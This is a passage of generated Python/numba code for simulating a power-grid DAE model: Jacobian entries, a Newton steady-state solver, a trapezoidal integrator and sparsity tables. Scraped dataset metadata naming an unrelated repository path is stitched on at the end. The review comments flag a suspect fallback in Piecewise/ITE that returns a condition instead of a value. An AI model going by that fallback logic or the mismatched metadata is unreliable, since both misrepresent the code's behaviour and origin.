struct[0].Gy[12,11] = V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy[12,12] = V_POImv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv)) + V_W2mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv)) + V_W3lv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv)) + 2*V_W3mv*(g_W2mv_W3mv + g_W3mv_POImv + g_W3mv_W3lv)
struct[0].Gy[12,13] = V_POImv*V_W3mv*(-b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(-b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy[12,14] = V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy[12,15] = V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy[13,4] = V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy[13,5] = V_W3lv*V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy[13,10] = V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy[13,11] = V_W2mv*V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy[13,12] = V_POImv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv)) + V_W2mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv)) + V_W3lv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv)) + 2*V_W3mv*(-b_W2mv_W3mv - b_W3mv_POImv - b_W3mv_W3lv - bs_W2mv_W3mv/2 - bs_W3mv_POImv/2 - bs_W3mv_W3lv/2)
struct[0].Gy[13,13] = V_POImv*V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy[13,14] = V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy[13,15] = V_POImv*V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) + g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy[14,12] = V_POImv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy[14,13] = V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy[14,14] = V_POI*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv)) + 2*V_POImv*(g_POI_POImv + g_STmv_POImv + g_W3mv_POImv) + V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy[14,15] = V_POI*V_POImv*(-b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv)) + V_POImv*V_STmv*(-b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(-b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy[14,16] = V_POImv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv))
struct[0].Gy[14,17] = V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv))
struct[0].Gy[14,18] = V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy[14,19] = V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy[15,12] = V_POImv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy[15,13] = V_POImv*V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) + g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy[15,14] = V_POI*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv)) + 2*V_POImv*(-b_POI_POImv - b_STmv_POImv - b_W3mv_POImv - bs_POI_POImv/2 - bs_STmv_POImv/2 - bs_W3mv_POImv/2) + V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy[15,15] = V_POI*V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv)) + V_POImv*V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy[15,16] = V_POImv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv))
struct[0].Gy[15,17] = V_POImv*V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) + g_STmv_POImv*cos(theta_POImv - theta_STmv))
struct[0].Gy[15,18] = V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy[15,19] = V_POI*V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) + g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy[16,6] = V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy[16,7] = V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy[16,14] = V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv))
struct[0].Gy[16,15] = V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv))
struct[0].Gy[16,16] = V_POImv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_STlv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv)) + 2*V_STmv*(g_STmv_POImv + g_STmv_STlv)
struct[0].Gy[16,17] = V_POImv*V_STmv*(-b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(-b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy[17,6] = V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy[17,7] = V_STlv*V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) + g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy[17,14] = V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv))
struct[0].Gy[17,15] = V_POImv*V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) + g_STmv_POImv*cos(theta_POImv - theta_STmv))
struct[0].Gy[17,16] = V_POImv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_STlv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv)) + 2*V_STmv*(-b_STmv_POImv - b_STmv_STlv - bs_STmv_POImv/2 - bs_STmv_STlv/2)
struct[0].Gy[17,17] = V_POImv*V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy[18,14] = V_POI*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy[18,15] = V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy[18,18] = V_GRID*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) + 2*V_POI*(g_POI_GRID + g_POI_POImv) + V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy[18,19] = V_GRID*V_POI*(-b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI)) + V_POI*V_POImv*(-b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy[18,20] = V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy[18,21] = V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy[19,14] = V_POI*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy[19,15] = V_POI*V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) + g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy[19,18] = V_GRID*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI)) + 2*V_POI*(-b_POI_GRID - b_POI_POImv - bs_POI_GRID/2 - bs_POI_POImv/2) + V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy[19,19] = V_GRID*V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) + V_POI*V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy[19,20] = V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy[19,21] = V_GRID*V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) + g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy[20,18] = V_GRID*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy[20,19] = V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy[20,20] = 2*V_GRID*g_POI_GRID + V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy[20,21] = V_GRID*V_POI*(-b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy[20,25] = -S_n_GRID/S_base
struct[0].Gy[21,18] = V_GRID*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy[21,19] = V_GRID*V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) + g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy[21,20] = 2*V_GRID*(-b_POI_GRID - bs_POI_GRID/2) + V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy[21,21] = V_GRID*V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy[21,26] = -S_n_GRID/S_base
struct[0].Gy[22,20] = K_p_GRID*(-i_d_GRID*sin(delta_GRID - theta_GRID) - i_q_GRID*cos(delta_GRID - theta_GRID))
struct[0].Gy[22,21] = K_p_GRID*(V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID))
struct[0].Gy[22,22] = -1
struct[0].Gy[22,23] = K_p_GRID*(-2*R_v_GRID*i_d_GRID - V_GRID*sin(delta_GRID - theta_GRID))
struct[0].Gy[22,24] = K_p_GRID*(-2*R_v_GRID*i_q_GRID - V_GRID*cos(delta_GRID - theta_GRID))
struct[0].Gy[22,27] = K_p_GRID
struct[0].Gy[23,20] = -sin(delta_GRID - theta_GRID)
struct[0].Gy[23,21] = V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy[23,23] = -R_v_GRID
struct[0].Gy[23,24] = X_v_GRID
struct[0].Gy[24,20] = -cos(delta_GRID - theta_GRID)
struct[0].Gy[24,21] = -V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy[24,23] = -X_v_GRID
struct[0].Gy[24,24] = -R_v_GRID
struct[0].Gy[25,20] = i_d_GRID*sin(delta_GRID - theta_GRID) + i_q_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy[25,21] = -V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy[25,23] = V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy[25,24] = V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy[25,25] = -1
struct[0].Gy[26,20] = i_d_GRID*cos(delta_GRID - theta_GRID) - i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy[26,21] = V_GRID*i_d_GRID*sin(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy[26,23] = V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy[26,24] = -V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy[26,26] = -1
struct[0].Gy[27,22] = -1/Droop_GRID
struct[0].Gy[27,27] = -1
struct[0].Gy[27,29] = K_sec_GRID
struct[0].Gy[28,22] = 1
struct[0].Gy[28,28] = -1
struct[0].Gy[29,28] = -K_p_agc
struct[0].Gy[29,29] = -1
struct[0].Gu[0,0] = -1/S_base
struct[0].Gu[1,1] = -1/S_base
struct[0].Gu[2,2] = -1/S_base
struct[0].Gu[3,3] = -1/S_base
struct[0].Gu[4,4] = -1/S_base
struct[0].Gu[5,5] = -1/S_base
struct[0].Gu[6,6] = -1/S_base
struct[0].Gu[7,7] = -1/S_base
struct[0].Gu[8,8] = -1/S_base
struct[0].Gu[9,9] = -1/S_base
struct[0].Gu[10,10] = -1/S_base
struct[0].Gu[11,11] = -1/S_base
struct[0].Gu[12,12] = -1/S_base
struct[0].Gu[13,13] = -1/S_base
struct[0].Gu[14,14] = -1/S_base
struct[0].Gu[15,15] = -1/S_base
struct[0].Gu[16,16] = -1/S_base
struct[0].Gu[17,17] = -1/S_base
struct[0].Gu[18,18] = -1/S_base
struct[0].Gu[19,19] = -1/S_base
struct[0].Gu[20,20] = -1/S_base
struct[0].Gu[21,21] = -1/S_base
struct[0].Gu[22,23] = K_p_GRID
struct[0].Gu[27,23] = -1
struct[0].Gu[27,24] = 1
struct[0].Gu[27,25] = 1/Droop_GRID
@numba.njit(cache=True)
def Piecewise(arg):
    """Numba-compiled stand-in for sympy's Piecewise after lambdify.

    ``arg`` is a sequence of ``(value, condition)`` pairs. The loop scans
    from the last pair down to the first, so the pair with the LOWEST index
    whose condition is true provides the returned value (last write wins).
    """
    # NOTE(review): fallback is arg[0][1] (the first CONDITION, a boolean),
    # not arg[0][0]; if no condition holds the boolean itself is returned.
    # This mirrors the code generator's output — confirm intended.
    out = arg[0][1]
    N = len(arg)
    for it in range(N-1,-1,-1):
        if arg[it][1]: out = arg[it][0]
    return out
@numba.njit(cache=True)
def ITE(arg):
    """If-Then-Else evaluator for generated expressions.

    Byte-for-byte the same algorithm as ``Piecewise`` above: ``arg`` is a
    sequence of ``(value, condition)`` pairs and the lowest-index pair whose
    condition is true wins (backward scan, last assignment sticks).
    """
    # NOTE(review): duplicated from Piecewise by the code generator; the
    # arg[0][1] fallback (a condition, not a value) applies here as well.
    out = arg[0][1]
    N = len(arg)
    for it in range(N-1,-1,-1):
        if arg[it][1]: out = arg[it][0]
    return out
@numba.njit(cache=True)
def Abs(x):
    """Absolute value; sympy's ``Abs`` mapped onto ``np.abs`` for numba."""
    return np.abs(x)
@numba.njit(cache=True)
def ini_dae_jacobian_numba(struct,x):
    """Assemble the initialization Jacobian ``Ac_ini`` at the point ``x``.

    ``x`` stacks the state vector (first ``N_x`` entries) and the algebraic
    vector ``y_ini`` (next ``N_y`` entries). After loading them into
    ``struct``, modes 10 and 11 of ``ini`` evaluate the four Jacobian
    sub-blocks, which are then scattered into the dense composite

        Ac_ini = [[Fx_ini, Fy_ini],
                  [Gx_ini, Gy_ini]]

    using the precomputed nonzero (row, col) patterns, with the G rows and
    the y columns offset by ``N_x``.
    """
    N_x = struct[0].N_x
    N_y = struct[0].N_y
    struct[0].x[:,0] = x[0:N_x]
    struct[0].y_ini[:,0] = x[N_x:(N_x+N_y)]
    # Mode 10/11: evaluate state and algebraic Jacobians at the loaded point.
    ini(struct,10)
    ini(struct,11)
    # Scatter only the known nonzeros; untouched entries of Ac_ini keep
    # whatever value they already hold (expected to be zero).
    for row,col in zip(struct[0].Fx_ini_rows,struct[0].Fx_ini_cols):
        struct[0].Ac_ini[row,col] = struct[0].Fx_ini[row,col]
    for row,col in zip(struct[0].Fy_ini_rows,struct[0].Fy_ini_cols):
        struct[0].Ac_ini[row,col+N_x] = struct[0].Fy_ini[row,col]
    for row,col in zip(struct[0].Gx_ini_rows,struct[0].Gx_ini_cols):
        struct[0].Ac_ini[row+N_x,col] = struct[0].Gx_ini[row,col]
    for row,col in zip(struct[0].Gy_ini_rows,struct[0].Gy_ini_cols):
        struct[0].Ac_ini[row+N_x,col+N_x] = struct[0].Gy_ini[row,col]
@numba.njit(cache=True)
def ini_dae_problem(struct,x):
    """Evaluate the initialization residual ``fg = [f; g]`` at ``x``.

    ``x`` stacks states and algebraic variables exactly as in
    ``ini_dae_jacobian_numba``. Modes 2 and 3 of ``ini`` compute the
    differential residual ``f`` and the algebraic residual ``g``, which are
    then packed into ``struct[0].fg`` for the Newton solver.
    """
    N_x = struct[0].N_x
    N_y = struct[0].N_y
    struct[0].x[:,0] = x[0:N_x]
    struct[0].y_ini[:,0] = x[N_x:(N_x+N_y)]
    # Mode 2/3: evaluate f and g at the loaded point.
    ini(struct,2)
    ini(struct,3)
    struct[0].fg[:N_x,:] = struct[0].f[:]
    struct[0].fg[N_x:,:] = struct[0].g[:]
@numba.njit(cache=True)
def ssate(struct,xy):
    """Solve the steady-state problem ``fg(xy) = 0`` by Newton's method.

    ``xy`` (column vector, modified in place) stacks states and algebraic
    variables. At most 100 iterations; convergence when the max-norm of the
    residual drops below 1e-8. On exit the converged point is also copied
    back into ``struct[0].x`` / ``struct[0].y_ini``.

    Returns the (updated) ``xy`` and the index of the last iteration run.
    """
    for it in range(100):
        # Jacobian and residual at the current iterate.
        ini_dae_jacobian_numba(struct,xy[:,0])
        ini_dae_problem(struct,xy[:,0])
        # Newton step: Ac_ini * dxy = -fg
        xy[:] += np.linalg.solve(struct[0].Ac_ini,-struct[0].fg)
        if np.max(np.abs(struct[0].fg[:,0]))<1e-8: break
    N_x = struct[0].N_x
    struct[0].x[:,0] = xy[:N_x,0]
    struct[0].y_ini[:,0] = xy[N_x:,0]
    return xy,it
@numba.njit(cache=True)
def daesolver(struct):
    """Integrate the DAE from ``struct.t`` to ``struct.t_end``.

    Time stepping uses the implicit trapezoidal rule (``solvern == 5``)
    with a damped-free Newton inner loop of at most ``imax`` iterations per
    step. Results are stored into the ``T``/``X``/``Y``/``Z`` channel
    arrays every ``decimation`` steps when ``store == 1``. All state lives
    in ``struct`` (record 0) and is mutated in place; the final simulation
    time is returned.
    """
    sin = np.sin
    cos = np.cos
    sqrt = np.sqrt
    i = 0
    Dt = struct[i].Dt
    N_x = struct[i].N_x
    N_y = struct[i].N_y
    N_z = struct[i].N_z
    decimation = struct[i].decimation
    eye = np.eye(N_x)
    t = struct[i].t
    t_end = struct[i].t_end
    if struct[i].it == 0:
        # First call: evaluate outputs (mode 1) and store the initial point.
        run(t,struct, 1)
        struct[i].it_store = 0
        struct[i]['T'][0] = t
        struct[i].X[0,:] = struct[i].x[:,0]
        struct[i].Y[0,:] = struct[i].y_run[:,0]
        struct[i].Z[0,:] = struct[i].h[:,0]
    solver = struct[i].solvern
    while t<t_end:
        struct[i].it += 1
        struct[i].t += Dt
        t = struct[i].t
        if solver == 5: # Trapezoidal DAE as in Milano's book
            # Residuals at the beginning of the step (previous accepted point).
            run(t,struct, 2)
            run(t,struct, 3)
            x = np.copy(struct[i].x[:])
            y = np.copy(struct[i].y_run[:])
            f = np.copy(struct[i].f[:])
            g = np.copy(struct[i].g[:])
            for iter in range(struct[i].imax):
                # Modes 2/3: residuals; modes 10/11: Jacobians at the iterate.
                run(t,struct, 2)
                run(t,struct, 3)
                run(t,struct,10)
                run(t,struct,11)
                x_i = struct[i].x[:]
                y_i = struct[i].y_run[:]
                f_i = struct[i].f[:]
                g_i = struct[i].g[:]
                F_x_i = struct[i].Fx[:,:]
                F_y_i = struct[i].Fy[:,:]
                G_x_i = struct[i].Gx[:,:]
                G_y_i = struct[i].Gy[:,:]
                # Trapezoidal iteration matrix:
                #   [[I - Dt/2*Fx, -Dt/2*Fy],
                #    [     Gx    ,    Gy   ]]
                A_c_i = np.vstack((np.hstack((eye-0.5*Dt*F_x_i, -0.5*Dt*F_y_i)),
                                   np.hstack((G_x_i, G_y_i))))
                # Trapezoidal residual for the differential equations.
                f_n_i = x_i - x - 0.5*Dt*(f_i+f)
                # print(t,iter,g_i)
                Dxy_i = np.linalg.solve(-A_c_i,np.vstack((f_n_i,g_i)))
                x_i = x_i + Dxy_i[0:N_x]
                y_i = y_i + Dxy_i[N_x:(N_x+N_y)]
                struct[i].x[:] = x_i
                struct[i].y_run[:] = y_i
                # [f_i,g_i,F_x_i,F_y_i,G_x_i,G_y_i] = smib_transient(x_i,y_i,u);
                # A_c_i = [[eye(N_x)-0.5*Dt*F_x_i, -0.5*Dt*F_y_i],
                #          [           G_x_i,           G_y_i]];
                # f_n_i = x_i - x - 0.5*Dt*(f_i+f);
                # Dxy_i = -A_c_i\[f_n_i.',g_i.'].';
                # x_i = x_i + Dxy_i(1:N_x);
                # y_i = y_i + Dxy_i(N_x+1:N_x+N_y);
                xy = np.vstack((x_i,y_i))
                # Relative-error convergence test; denominator floored at
                # 0.001 so near-zero variables do not dominate the test.
                max_relative = 0.0
                for it_var in range(N_x+N_y):
                    abs_value = np.abs(xy[it_var,0])
                    if abs_value < 0.001:
                        abs_value = 0.001
                    relative_error = np.abs(Dxy_i[it_var,0])/abs_value
                    if relative_error > max_relative: max_relative = relative_error
                if max_relative<struct[i].itol:
                    break
                # if iter>struct[i].imax-2:
                #     print('Convergence problem')
            struct[i].x[:] = x_i
            struct[i].y_run[:] = y_i
        # channels: store decimated trajectory samples.
        if struct[i].store == 1:
            it_store = struct[i].it_store
            if struct[i].it >= it_store*decimation:
                struct[i]['T'][it_store+1] = t
                struct[i].X[it_store+1,:] = struct[i].x[:,0]
                struct[i].Y[it_store+1,:] = struct[i].y_run[:,0]
                struct[i].Z[it_store+1,:] = struct[i].h[:,0]
                struct[i].iters[it_store+1,0] = iter
                struct[i].it_store += 1
    struct[i].t = t
    return t
def nonzeros():
    """Return the hard-coded sparsity patterns of the model Jacobians.

    Each ``*_rows``/``*_cols`` pair lists, in matching order, the (row, col)
    coordinates of the structurally nonzero entries of the corresponding
    initialization Jacobian block (Fx, Fy, Gx, Gy). Generated together with
    the model; do not edit the numbers by hand.
    """
    Fx_ini_rows = [0, 1, 2]
    Fx_ini_cols = [0, 0, 2]
    Fy_ini_rows = [0, 0, 1, 1, 1, 1, 1, 2, 3]
    Fy_ini_cols = [22, 28, 20, 21, 23, 24, 27, 26, 28]
    Gx_ini_rows = [22, 22, 23, 24, 24, 25, 26, 29]
    Gx_ini_cols = [0, 1, 0, 0, 2, 0, 0, 3]
    Gy_ini_rows = [0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 6, 6, 6, 6, 7, 7, 7, 7, 8, 8, 8, 8, 8, 8, 9, 9, 9, 9, 9, 9, 10, 10, 10, 10, 10, 10, 10, 10, 11, 11, 11, 11, 11, 11, 11, 11, 12, 12, 12, 12, 12, 12, 12, 12, 13, 13, 13, 13, 13, 13, 13, 13, 14, 14, 14, 14, 14, 14, 14, 14, 15, 15, 15, 15, 15, 15, 15, 15, 16, 16, 16, 16, 16, 16, 17, 17, 17, 17, 17, 17, 18, 18, 18, 18, 18, 18, 19, 19, 19, 19, 19, 19, 20, 20, 20, 20, 20, 21, 21, 21, 21, 21, 22, 22, 22, 22, 22, 22, 23, 23, 23, 23, 24, 24, 24, 24, 25, 25, 25, 25, 25, 26, 26, 26, 26, 26, 27, 27, 27, 28, 28, 29, 29]
    Gy_ini_cols = [0, 1, 8, 9, 0, 1, 8, 9, 2, 3, 10, 11, 2, 3, 10, 11, 4, 5, 12, 13, 4, 5, 12, 13, 6, 7, 16, 17, 6, 7, 16, 17, 0, 1, 8, 9, 10, 11, 0, 1, 8, 9, 10, 11, 2, 3, 8, 9, 10, 11, 12, 13, 2, 3, 8, 9, 10, 11, 12, 13, 4, 5, 10, 11, 12, 13, 14, 15, 4, 5, 10, 11, 12, 13, 14, 15, 12, 13, 14, 15, 16, 17, 18, 19, 12, 13, 14, 15, 16, 17, 18, 19, 6, 7, 14, 15, 16, 17, 6, 7, 14, 15, 16, 17, 14, 15, 18, 19, 20, 21, 14, 15, 18, 19, 20, 21, 18, 19, 20, 21, 25, 18, 19, 20, 21, 26, 20, 21, 22, 23, 24, 27, 20, 21, 23, 24, 20, 21, 23, 24, 20, 21, 23, 24, 25, 20, 21, 23, 24, 26, 22, 27, 29, 22, 28, 28, 29]
    return Fx_ini_rows,Fx_ini_cols,Fy_ini_rows,Fy_ini_cols,Gx_ini_rows,Gx_ini_cols,Gy_ini_rows,Gy_ini_cols
| 74.089392
| 799
| 0.665835
| 35,462
| 186,483
| 3.117873
| 0.009785
| 0.099144
| 0.050712
| 0.033971
| 0.946494
| 0.928459
| 0.916484
| 0.901163
| 0.892562
| 0.885408
| 0
| 0.082997
| 0.180617
| 186,483
| 2,517
| 800
| 74.089392
| 0.640598
| 0.012511
| 0
| 0.738701
| 0
| 0
| 0.012139
| 0.000979
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02354
| false
| 0
| 0.001883
| 0.000942
| 0.039548
| 0.003766
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7eb196a7c0cd188ce7415cb9be7e2b606c30f1de
| 1,778
|
py
|
Python
|
axopy/features/__init__.py
|
agamemnonc/axopy
|
e8c324a4ecfc0abdec3016bca62dcf84d371b6c0
|
[
"MIT"
] | 2
|
2019-11-13T08:04:27.000Z
|
